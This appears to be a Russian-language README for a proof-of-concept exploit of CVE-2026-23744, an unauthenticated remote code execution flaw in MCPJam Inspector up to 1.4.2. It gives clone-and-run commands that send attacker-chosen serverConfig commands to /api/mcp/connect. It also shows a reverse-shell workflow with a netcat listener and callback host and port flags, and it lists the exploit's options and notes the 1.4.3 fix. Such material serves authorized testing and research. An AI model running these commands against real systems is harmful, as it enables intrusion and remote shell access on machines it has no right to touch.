
Proof-of-concept удалённого выполнения кода без аутентификации для CVE-2026-23744, нацеленный на MCPJam Inspector. Генерирует специально сформированные полезные нагрузки MCP serverConfig для эксплуатации конечной точки /api/mcp/connect с поддержкой reverse shell и отладки в режиме dry-run.
PoC для неаутентифицированного удалённого выполнения кода через CVE-2026-23744. MCPJam Inspector 1.4.2 и более ранние версии открывают функциональность через /api/mcp/connect, которая позволяет запустить управляемую атакующим команду MCP-сервера без аутентификации.
Только для авторизованного тестирования и исследований. Не используйте против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения.
HTTP POST -> /api/mcp/connect -> команда serverConfig -> запуск процесса -> выполнение команды
serverConfig для MCP./api/mcp/connect.bash -c.


git clone https://github.com/ozcanpng/CVE-2026-23744.git
cd CVE-2026-23744
pip install -r requirements.txt
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--cmd 'id'
Сначала запустите слушатель:
rlwrap nc -lvnp 4444
Затем выполните:
python3 CVE-2026-23744.py \
--url http://127.0.0.1:3000 \
--reverse-shell \
--lhost 10.10.16.53 \
--lport 4444
Полезные опции:
--cmd COMMAND Команда для выполнения (по умолчанию: id)
--server-id VALUE Значение serverId в созданном MCP-конфиге (по умолчанию: pwn)
--dry-run Построить поток payload без отправки HTTP-запроса
--debug Вывести конечную точку и JSON-payload
--verify-tls Проверять HTTPS-сертификаты
--timeout SECONDS Таймаут HTTP в секундах (по умолчанию: 8)
--yes Пропустить запрос подтверждения reverse shell
| Продукт | Затронутая версия | Требуемый доступ | Воздействие |
|---|---|---|---|
| MCPJam Inspector | <= 1.4.2 | Нет | Удалённое выполнение команд от имени пользователя процесса MCPJam Inspector |
Проблема особенно заметна, когда MCPJam Inspector прослушивает порты на 0.0.0.0, что позволяет удалённым хостам получить доступ к сервису разработки.
/api/mcp/connect.serverConfig.command и serverConfig.args.--cmd.--dry-run --debug для проверки сгенерированного запроса без воздействия на цель.1.4.3 содержит исправление из апстрима.ozcanpng — github.com/ozcanpng — ozcanpng.dev